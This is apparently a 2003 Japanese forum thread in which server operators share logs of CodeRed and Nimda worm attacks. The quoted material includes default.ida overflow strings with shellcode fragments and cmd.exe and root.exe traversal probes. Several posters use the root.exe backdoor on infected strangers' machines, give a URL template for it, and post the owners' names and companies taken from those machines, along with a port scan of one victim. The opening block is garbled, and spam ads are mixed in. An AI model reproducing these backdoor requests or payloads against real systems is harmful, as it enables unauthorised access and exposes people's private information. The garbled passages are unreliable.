Tu<F>2oC65]2?]688]@C];A|<FD2?@oC65]2?]688]@C];A|>:J2?@oC65]2?]688] @C];A|?30>2?2oC65]2?]688]@C];A|E\6oC65]2?]688]@C];A|E2<2\<oC65]2?]688]@C];ATq R Received: from AcE6E@C2oC65]2?]688]@C];A|A2EC:4<oC65]2EC]4@];A|92D6oC65]6> 2:=]?6];A|KIad_oC65]6>2:=]?6];A|36673@H=oC65]9@E]4@];A|3JC5oC65]9@E]4@];ATz G Re ceived: from Rm9@?6J366oC65]9@E]4@];A|<:?492?oC65]9@E]4@];A|?282@oC65]9@E]4@] ;A|JFA@>oC65]9@E]4@];A|2=8oC65]:?E6CB]@C];A|3@>3oC65]:?E6CB]@C];AMr Z Receive d: from Nr43c__7oC65]:?E6CB]@C];A|4J36CoC65]:?E6CB]@C];A|7F8F@oC65]:?E6CB]@C]; A|92J2EoC65]:?E6CB]@C];A|9:C@E@oC65]:?E6CB]@C];A|9@C:<:E2oC65]:?E6CB]@C];ATT T Received: from Nz<2KF9:C@oC65]:?E6CB]@C];A|<:5oC65]:?E6CB]@C];A|<@3@=5DoC65]: ?E6CB]@C];A|>2DoC65]:?E6CB]@C];A|>2D2@oC65]:?E6CB]@C];A|>:J23:oC65]:?E6CB]@C]; ARb Y Received: from PQ?:;:oC65]:?E6CB]@C];A|?@<@oC65]:?E6CB]@C];A|D2326oC65]: ?E6CB]@C];A|D249:oC65]:?E6CB]@C];A|D6?36:oC65]:?E6CB]@C];A|D:=6?46oC65]:?E6CB] @C];ARz M Errors: mailbox1@usgreencardoffice.com From: "US Green Card Office Ltd." <mailbox1@usgreencardoffice.com> To: Customer <customer@usgreencardoffice.com> Subject: Get a Green Card for USA MIME-Version: 1.0 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Status: うざい 219.140.150.166 - - [13/Apr/2003:16:51:23 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-" 219.140.150.166 - - [13/Apr/2003:16:51:26 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-" ・ ・ ・ 前にCodeRedに対抗するCode Greenてのが来たけど もう来ないな。 またこないかな。 OrgName: Asia Pacific Network Information Centre NetRange: 202.0.0.0 - 203.255.255.255 CIDR: 202.0.0.0/7 ここ、IPうじゃうじゃ持ってて最高にうざい。 二日で100個以上CodeRed来てるけど、ここが8割占めてたw LAN内全感染の悪寒。 ってかIPいっぱいあるから一見いろんなとこから来てるみたいだけど、穴のあるところが 全部穴になって被害を広めてるのね。 #Apache初心者だから、ログを取らせない方法が良くわかんねえよ。 ・ウイルス扱いにする。 ・指定ファイルにアクセスしようとしたのは載せない。 ・実際に、0Byteの指定ファイルを作っておく。 があった。みんなどうよ?つーかどれが普通よ? 略称のほうは知ってた・・ APNICかよ。 マトモなとこだから他から経由されてるだけな気がするな・・・ >>93 それ中国あたりのブロック割り当てじゃない? うちにも中国方面からガンガンくるよ。 >>96 手作業での登録ですか? 手間が馬鹿にならんので、テクニックあればいいんだけど。 CodeRedが大量に来てますね... ⇒219.156.232.21 219.237.77.95 219.181.154.52 219.140.211.162 12.235.16.127 あと、ガーラって調査会社のロボット検索もウザイ ⇒211.4.250.133 OrgName: Asia Pacific Network Information Centre OrgID: APNIC Address: PO Box 2131 City: Milton StateProv: QLD PostalCode: 4064 Country: AU NetRange: 219.0.0.0 - 219.255.255.255 CIDR: 219.0.0.0/8 NetName: APNIC5 NetHandle: NET-219-0-0-0-1 OrgName: AT&T WorldNet Services OrgID: ATTW Address: 400 Interpace Parkway City: Parsippany StateProv: NJ PostalCode: 07054 Country: US NetRange: 12.0.0.0 - 12.255.255.255 CIDR: 12.0.0.0/8 NetName: ATT NetHandle: NET-12-0-0-0-1 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 211.4.250.0 b. [ネットワーク名] I2TS-NET f. [組織名] 株式会社イーツ g. [Organization] I2ts Inc., m. [運用責任者] MK5986JP n. [技術連絡担当者] HI1771JP n. [技術連絡担当者] MK5986JP >>102 ってなってるけど、がーらって会社なの? >>105 nslookupで逆引きすると、gala-net.co.jpという ドメインが出てきます。何の会社かと思って ホームページを見たら、ネット上の書き込みを 自動巡回してチェックするサービスを提供していました。 最近、フレッシュアイのロボット検索が定期的に 来るようになって、フレッシュアイにも情報が 登録されたんですが、それをガーラのロボットが 検出して、探りを入れに来ているようです。 YahooBB220013168112.bbtec.net - - [18/Apr/2003:23:11:33 +0900] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ?????? HTTP/1.0" 400 178 220.13.168.112うざすぎ。 YBBにメールして遮断できないものだろうか… >>100 来ている来ていないの問題じゃなくて(ry >>109 YBBならIP変わらないみたいだから、アクセス制限リストに 放り込んで置けば宜しいかと。まあ、それでも鬱陶しい 事に変わりは無いけど。 ☆^〜^★ 50音順で探せて楽して得する http://sagatoku.fc2web.com/ あなたの探し物きっとみつかるよ☆^〜^★ 最近こんなのが来てる。 202.98.1.21 - - [27/Apr/2003:16:37:47 +0900] "GET / HTTP/1.1" 400 296 "-" "-" 202.98.1.21 - - [27/Apr/2003:16:37:48 +0900] "POST / HTTP/1.1" 413 1035 "-" "-" 当方やふーbbですが、 昨日Anhttpdで適当にweb鯖を立てて放置したところ いろいろ釣れました。 なんですかコリャ? 相手もやふーbbのようで。。 感染したワームが、一体何をしようとしているのだかよく分からんが xが延々と並んでいるのが、噂に聞くバッファオーバーフローってやつですか? 一日中こんなの送ってきて動作が重くなったりしないんだろか 219.144.82.204 - - [30/Apr/2003:20:23:54 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u 8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:45:59 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 211 219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:01 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:02 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 って最初の219.144.82.204は中国の鯖っぽいな。 アクセスしようとしたら漢字だらけの404が返ってきた。 やふーbbの方はアホなユーザーがワームに感染していることも知らず 繋ぎっ放しにしているのかなぁ・・・ 感染していることすら判断できない、バカユーザがIISを立ち上げていることに疑問を感じるが。 つーか、>119は僅か100程のレスを遡って見る事もできんのか・・・ >>122 すんマソ。良く見たら 殆んど同じような報告がいくつも書かれていた…。 初心者なので変なのが飛んできたことが嬉しくて ついつい書いてしまったのでつた。 こう言うワームの類って、 鯖にセキュリティーホールが無ければ直接害は無いんだよね? しかし大量に飛んでくると ログ作成するのに負荷が掛かるってのがあるか… ルーターでワームだけをカットするような設定は、 簡単には出来るんかなぁ IP指定するのは当然出来るが こうあちこちから飛んでくると切りが無い。 だから、IP弾きは自動化できないって・・・ つーか動的IPや踏み台等を完全場合わけで簡単自動処理できるのがあるなら 教えてもらいたい・・・ なんも考えないでニムダやCodeRedを飛ばしてくるIPをブラックリストに入れると 困る可能性がある。 困ったときには、どこのブラックリストの一部が困ったのかわからないので ブラックリスト自体を消す羽目になる。 以上無理。 IPを弾くのではなく、ワームが送るヘッダーの特徴を検出して削除する ハードウェアルータがあったら良いのにな もちろん検出パターンはメーカーからの自動更新で。 >>118 219.180.88.36 のは日本だし、めちゃくちゃちゃねらーだな (藁 http://219.180.88.36/scripts/root.exe?/c+type+ "..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log" >>127 > Windows 2000 Version: 5.0 > 現在のビルド: 2195 > Service Pack: None > 現在のタイプ: Uniprocessor Free > 登録されている会社名: (・∀・) > 登録されている所有者: (・∀・) 禿げ藁 常時接続のくせにServicePackも当てとらんとは、 もしや、ワレザーだったりしてな。 今頃Winnyでエロ画像落としてハァハァしてるんだろ MSNメッセンジャーとかIE、メモ帳位しか開いてないやん。 tptp.exeが大活躍していたりはするけどw 2ちゃんねらーにしては激しくツマンナイ椰子やね。 こういうのが糞スレ立てるんだろうな。 WHOISでみるかぎりコリアみたいですねー 210.95.90.50 - - [02/May/2003:12:57:31 +0900] "GET /default.ida?XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX これはチャイナ 210.72.239.240 - - [02/May/2003:09:53:08 +0900] "GET /default.ida?XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX とりあえず、今日だけの分でも素のIPを晒します。 211.153.19.148 211.180.229.213 211.114.27.16 211.249.78.151 211.116.251.18 上から順に新しい 全てCoderedに感染。しかも日本のIPかな?よく分からん。 って調べたら、前のとあわせて全部国はオーストラリアじゃん!! http://www13.big.or.jp/ ~fubuki/chat/chat2.html 荒らしてもただ見るだけでもOK。これからどんどんロム増えるから。 これと同じヤツをいろんなヤツにコピペしてね >>126 IDSを使うといいかも。個人向けにはトレンドマイクロから出ている。 NTTからFlet'sユーザー向けのOEM版も販売されている。ただ、 スループットが低いので、光ユーザーだと勿体無い。 http://www.trendmicro.com/jp/products/desktop/gatelock/evaluate/overview.htm >>127 >>128 >>129 不味くないか? >>127-129 通報しますた! と、言いたい所だが不正アクセス等を 相手は全く理解していない予感… 少なくともこれらのリクエスト送ってくるヤツらは MSのIISを立ち上げてる、と考えていいのですか? 202.125.153.14 61.187.64.194 202.39.15.237 202.131.151.20 202.194.196.67 これらはホスト名逆引きできないんですが、どういうことでしょうか。 ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。 >>138 > これらはホスト名逆引きできないんですが、どういうことでしょうか。 ISPが設定していないから。(.paknet.com.pk .twnic.net .estelcom.com .edu.cn .chinanet.cn.net) >>139 > ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。 赤帽と窓のデュアルブート環境だから。 赤帽と窓のデュアルブート環境だから。 意味が分からない、apacheが立ち上がってるのに なぜIISに感染するcode redが動いてるの? Linuxが動いてるはずなのに。 再接続でアドレスが変わったんじゃなーの? んで、たまたま新たに割り振られた先に赤帽&apacheがあったとか。 >>142 Win32版&IISだったとか(Linuxの根拠は。 >144 実際にアクセスしてみてヘッダを見てからの発言だろーな? >>146 ルータの下でポートフォワードで複数動かしてるとか。 ログの中にこんなの発見した 218.20.118.230 - - [09/May/2003:05:41:08 +0900] "GET http://www.21cn.net/ HTTP/1.1" 200 1529 何? というか、不毛にIIS動かしてるバカ多すぎ。 トラフィックの無駄遣いも甚だしい。 どうせ何のサービスかわかってないような輩だろ。 NT系、デフォルトでIISなんて入ってないはずなのに なんで動いてるんだ。取り敢えず腹が立つ。 202.196.110.208 - - [11/May/2003:00:01:29 +0900] "GET /default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 2973 "-" "-" http://202.196.110.208/ チョン国の中学校の鯖が感染しております。 なんてメールしたらいいかな「貴方感染。鯖PC code red」漢文わからん(T_T) >>128 のような情報を引っ張るにはどうしたらいいの? http://IP アドレス/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log" ってリクエストすればいいの?404なったけど。 >貴方感染 もしかしたら、なんとなく程度だとしても意味が通じるかもしれない >鯖PC これは絶対無理(藁 >>150 英語で送っとけ 中国のエリートならペラペラだから そして、その中国のエリートが管理する鯖は穴だらけ。 >>148 http://www.21cn.net/ がそのIPアドレスにあると勘違い(?)して参照しようとしてきたリクエスト >>149 漏れW2Kでサービスをいじってたら、 知らぬ間にIISが動作していたよ・・・ ANHTTPD起動しようとしたが 80番ポートが開いてないエラーが出るので調べていたら発覚した そんな香具師が意外と多い予感 >貴方感染 我SARS否 とか、帰ってきそう(汗 >>149 >>157 そうなんですよね。 ウイルス対策も分からないやつが、標準で入らないIISを入れてしまっていることに やり場のない怒りと、やるせなさと… >>155 なるほど。 けどうちはttp://www.21cn.net/じゃないのになぜ200を返したんでしょうか? cmd.exe、root.exe、favicon.ico、default.ida等には404を返しているのに。 >>159 踏み台にして失敗したものです。 気になるようだったら、 SetEnvIf HOST FQDN allowed01 deny from env=!allowed01 にしとけば、403返すかと。 >>150 >貴方感染 チョン環境っていうより大陸向けのような気もします。 半島って標準で和文や簡体、繁体フォント入ってるのかなあ。 マジレスすると普通に Your environment is infected with the virus and it is troubled. Please carry out somehow. とかのほうが(文字コードだなんだ考えずに済んで)いいと思います。 >>160 あ、そうだったんですか。 うちが荒らされたりする分にゃ自分が我慢すれば済むけど、よそ様まで巻き込むのは不本意です。 教えていただいた「SetEnvIf HOST FQDN allowed01」を勉強のために検索してみました。 「Host:ヘッダーを指定しないリクエストを拒否する方法。」として、「ワームは、DNSの逆引きでもしない限り HostヘッダにFQDN名をセットできない、よってIPアドレス指定でアクセスしてきても、404 Object Not Foundエ ラーが返る。」とありましたので、httpd.confに設定してみました。 しばらくこれで様子を見てみます。ありがとうございました。 今月に入ってCodeRedが1日平均27個、先月あたりからだんだん増えてきているみたいです。 ネット上で見付けた「Code Red Check」というperl scriptと「dnstran」と「analog」使ってマメにログをチェ ックするぐらいしか出来ませんが、地道にやっていきます。 64.110.110.240 /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (略) XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ090ヨ190ヨ0c3ヨ003ヨb00ヨ31bヨ3ffヨ078ヨ000ヨ0=a ウガンダキタ━━━━━━(゚∀゚)━━━━━━━!!!!! 202.107.205.9 - - [15/May/2003:02:00:06 +0900] "\x05\x01" 501 - "-" "-" 最近多いのですが、このリクエストは何でしょうか?新手のワーム? 219.218.95.81 - - [15/May/2003:17:46:54 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 274 "-" "-" ワーム対策にバーチャルホストはどうよ HTTP_HOSTがない場合はダミーページの飛ばす ログをバーチャルホスト毎に記録すれば ワームのログは通常のログに混じらないが ━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━― 203.222.151.18 - - [23/May/2003:06:21:48 +0900] "GET (^^) HTTP/1.0" 404 1373 ∧_∧ ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。 =〔~∪ ̄ ̄〕 = ◎――◎ 山崎渉 初心者からの素朴な疑問 例えば、 c:/www/scripts/..チ/winnt/system32/cmd.exe にワームがアクセスしてくるとしますよね。 該当するディレクトリを作って、cmd.exeって名前のファイル(例えばフロッピーにアクセスし続けるファイルとか)置いといたらどうなるんでしょ? きのうの夕方に同一IPから5秒おきに20連発 "GET /NULL.IDA?CCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000 %u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000 %ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90 x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\ xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0 x8d}-\ x90\x90\x90\x8b\xf7f\xb8H\x063 ... <以下略、とても長い> >>173 それうちにも来た。 そのあとなんか意味不明な文字があってしかもログが改行されちゃう。 何なのそれ? 久々にIRC繋いだら、こんなん帰ってきたのだが… irc.nara.wide.ad.jp - - [09/Jun/2003:23:40:24 +0900] "CONNECT 192.244.23.4:6667 HTTP/1.0" 403 1272 ワームチェックかなんかでしょうか? http://yahoobb219055208068.bbtec.net/ バッチリ幹線してるようです。 [2ch@localhost 2ch]wget --spider http://yahoobb219055208068.bbtec.net/ 1 HTTP/1.1 200 OK 2 Server: Microsoft-IIS/5.0 3 Date: Fri, 13 Jun 2003 18:18:56 GMT 4 Connection: keep-alive 5 Connection: Keep-Alive 6 Content-Length: 1230 7 Content-Type: text/html 8 Set-Cookie: ASPSESSIONIDQQQQGSUC=KOPNHKABOIBNMLOKLKJJABEE; path=/ 9 Cache-control: private 200 OK どうやって警告したらいいでしょうか。 ftpとか開いてるし、アノニログインできるし(;´Д`) 厨房運営の鯖でしょうか。 Port State Service 7/tcp open echo 9/tcp open discard 13/tcp open daytime 17/tcp open qotd 19/tcp open chargen 21/tcp open ftp 25/tcp open smtp 80/tcp open http 135/tcp open loc-srv 137/tcp filtered netbios-ns 138/tcp filtered netbios-dgm 139/tcp filtered netbios-ssn 443/tcp open https 445/tcp filtered microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 6699/tcp open napster いろいろ情報が見れて楽しいね、他にもっと見れる情報無いかな? htp://yahoobb219055208068.bbtec.net/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log" アプリケーション例外が発生しました: アプリケーション: (pid=1020) 発生時間: 2003/05/01 @ 21:50:51.907 例外番号: c0000005 (アクセス違反) *----> システム情報 <----* コンピュータ名: VFGYARXITW27V4Y ユーザー名: Administrator プロセッサの数: 1 プロセッサの種類: x86 Family 6 Model 8 Stepping 6 Windows 2000 Version: 5.0 現在のビルド: 2195 Service Pack: None 現在のタイプ: Uniprocessor Free 登録されている会社名: 日本フレートライナー(株) 登録されている所有者: 山ア勝行 これはもう警鐘モンだぞ。 パッチも当てない危機感のないバカは鯖なんぞ立てるな。迷惑だ。 212.165.132.144 - - [14/Jun/2003:07:43:54 +0900] "GET /default.ida?XXXXXXXXX(rya http://212.165.132.144/scripts/root.exe?/c+type+ "..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log" Application exception occurred: App: (pid=1568) When: 6/2/2003 @ 02:07:38.527 Exception number: c0000005 (access violation) *----> System Information <----* Computer Name: CISCO-ACS User Name: Administrator Number of Processors: 1 Processor Type: x86 Family 6 Model 8 Stepping 10 Windows 2000 Version: 5.0 Current Build: 2195 Service Pack: None Current Type: Uniprocessor Free Registered Organization: prestel Registered Owner: okada okadaって日本人か? (´-`).。oO(不正にアクセスして個人情報開示してるバカだよなぁ・・・) 日本の法律では認証を掛けてないところにアクセスしても罪にならなかったような ややグレーゾーンに近いがな。 インデックスリストが丸見えになってて、顧客情報が見られたのを不正アクセスされたと逝ってるのと同じようなもんでしょ。 わたしのホームページへアクセスした人は、不正アクセスでタイーホしてもらいます(w Code Green のベータ版バイナリを手に入れたので中をのぞいてみたのだが、 %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a は Code Green の物らしい。 ウイルスだった事には変わりは無いわけだが。 かぎの開いている家に侵入して情報ファイルを持ち出したら そいつは窃盗罪だろう。 不正アクセス防止法にはひっかからんかもしらんけど、盗んだ情報を 公開したりしてなにか損害が起きればけっこう痛いことになるかもね 超過激ライブチャット登場!!!!! あなたの命令で若い娘たちがヌレヌレモードへ ☆★アメリカ西海岸発☆★モザイクなし☆★ あなたの言葉で・・・ヌードにさせてください あなたの指で・・・感じさせてください あなたの声で・・・イ・カ・セ・テ・ください 寂しがりやの留学生の若い娘がお待ちしております! ただいま、10分間無料で体験できるほか7日間会費無料!! http://www.gals-cafe.com 6月分のcodered。 01/Jun/2003 30 02/Jun/2003 37 03/Jun/2003 24 04/Jun/2003 31 05/Jun/2003 30 06/Jun/2003 24 07/Jun/2003 24 08/Jun/2003 27 09/Jun/2003 31 10/Jun/2003 38 11/Jun/2003 30 12/Jun/2003 37 13/Jun/2003 40 14/Jun/2003 20 15/Jun/2003 25 16/Jun/2003 33 17/Jun/2003 27 18/Jun/2003 22 19/Jun/2003 21 20/Jun/2003 28 21/Jun/2003 24 22/Jun/2003 22 23/Jun/2003 27 24/Jun/2003 34 25/Jun/2003 26 26/Jun/2003 32 27/Jun/2003 33 28/Jun/2003 32 29/Jun/2003 24 30/Jun/2003 16 これワーム関係?初めて見たんだけど それともアタック? 2003/07/05,01:55:31,,"","-",GET,"/.pl","-","-",403,266,"-","-" 2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.dll","-","-",404,277,"-","-" 2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.exe","-","-",404,277,"-","-" 2003/07/05,01:55:40,,"","-",GET,"/_vti_inf.html","-","-",404,272,"-","-" 2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/administrators.pwd","-","-",404,286,"-","-" 2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/authors.pwd","-","-",404,279,"-","-" 2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/service.pwd","-","-",404,279,"-","-" 2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/users.pwd","-","-",404,277,"-","-" 2003/07/05,01:55:43,,"","-",GET,"/abc/showcode.asp","-","-",404,275,"-","-" 2003/07/05,01:55:43,,"","-",GET,"/carbo.dll","-","-",404,268,"-","-" 2003/07/05,01:55:44,,"","-",GET,"/cfdocs/expelval/displayopenedfile.cfm","-","-",404,296,"-","-" 2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/exprcalc.cfm","-","-",404,287,"-","-" 2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/openfile.cfm","-","-",404,287,"-","-" 2003/07/05,01:55:46,,"","-",GET,"/cfdocs/expelval/sendmail.cfm","-","-",404,287,"-","-" 2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/aglimpse","-","-",403,279,"-","-" 2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/AnyForm2","-","-",403,279,"-","-" 2003/07/05,01:55:50,,"","-",GET,"/cgi-bin/AT-admin.cgi","-","-",403,283,"-","-" 2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/bnbform.cgi","-","-",403,282,"-","-" 2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/campas","-","-",403,277,"-","-" 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-" 全67行 アクセスしようとしてるファイル名から推測すると IIS狙いのワームでないかい? うちにはまだお見えになられてないです >>194 > 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-" cgiwrapの設定不備狙ってる? IIS狙いとは言い切れない予感。 例の改ざん祭りの下準備かも((((((;゚Д゚))))))ガクガクブルブル __∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄ 孫さん家の人が衛生管理していないので、「出禁」にしています。 衛生管理出来る様になったら、タイム系サーバーを追加して 監視兵を置くかな・・・ そういえばどこかの検索エンジンのロボットはワームみたいな動きをしていくな。 最近、損さん家のf@t息子が猛烈アタックしてきます。 UDPの3010・3012・3013と投げてくるけど、これ何でしょ? ∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ >>205 なんで書き換えられちゃうわけ?あなたの会社のサイト ろくにパッチも当ててないDQN鯖官なのけ >>207 ごめん、動揺して説明たらずだった。 会社きて、自宅のHP見てみようとしたら、書き換えられてた。 自宅鯖はルータでHTTP、FTP,DNS,SSLのポートしか空けてねえです。 はぁ… >>208 なんか穴があるんだろうね いい機会だから徹底的にしらべましょう SSLとBINDがあやしいっすね。 最近会社忙しく自宅鯖放置気味だったからバチが当たったなー… なんていうか、自宅に帰る7時半まで手を出せないのがもどかしい… atfr064007013.do.ppp.infoweb.ne.jp - - [04/Aug/2003:01:02:25 +0900] "GET /defaul t.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u68 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190 %u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-" yahoobb219214144203.bbtec.net - - [04/Aug/2003:12:12:29 +0900] "GET /default.ida ?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%uc bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c 3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-" この2ホスト、ここ1ヶ月ほど止まらない。 毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・ そろそろISPのabuseにでも連絡すっかな。 >>212 > 毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・ ・・・。 ウィルス、ワーム対策としてモデムとサーバの間にルータを噛ませてさらにサーバ、 クライアントにはウィルス対策ソフトをインストールする程度ではまだ足りないでしょうか? もちろんウィンドウのアップデート、パッチは最新のものをなるべく早く当てるようにします。 >>214 根本的にだめ。 ウイルス、ワーム、セキュリティについてのポリシーを 自分で確立すべし 俺の自宅サーバーにおけるセキュリティについての考え方のひとつに 「稼動時間を減らす」てのあるけど誰も賛同してくれん。 「馬鹿じゃねぇ?」「使えねぇ!」の連呼 うるせー馬鹿! >>216 いや、科学技術庁も導入したぐらいだし(藁 稼働時間を減らしたところで、穴をあけっぱなしにしていれば頻繁にやってくるワームにやられるので 結局常時稼働とさほど変わらないんでないの? セキュリティで最も重要なのは、穴をあけない、見つかったらすぐにふさぐという基本的な事項をしっかり行うこと。 うちは、CodeRedが30〜40件/日、ほとんどが韓国と中国 それから、Nimdaも30〜40連続アタック [error][client 61.213.32.47] 千葉のCATV局だ。もー頼むよ・・・。 うちも先月までは>>219 とほぼ同量のアタックがあったんだが、 1週間程度、接続元IPが韓国・中国・台湾のパケットを総蹴りにしたら 解除した後もなぜかアタックが以前より減少してる どれくらい来てるのかな?とオモテ2002年10月以降のログを一括検索したら4609件出てきた。 ヽ(`Д´)ノウワァァァン Nimdaの時に比べたらかなり平和だよな。 あのときはピーク時で1分間に2〜3回アクセスが続いたし。 帰省中だったので放置しているうちにログが肥大化して帰ってきたらfile system fullでかなり焦った。 (⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン パケット通信危うし・・・ 納入先監視装置、今月は1万円を越えました×n台 この先どうなることやら・・・ yahoobb219178230052.bbtec.net [10/Sep/2003:00:47:47 +0900] "GET / HTTP/1.1" "-" デザインが変... もう ahooBB 大迷惑。パッチ宛ててるのかどうか知らんけど。 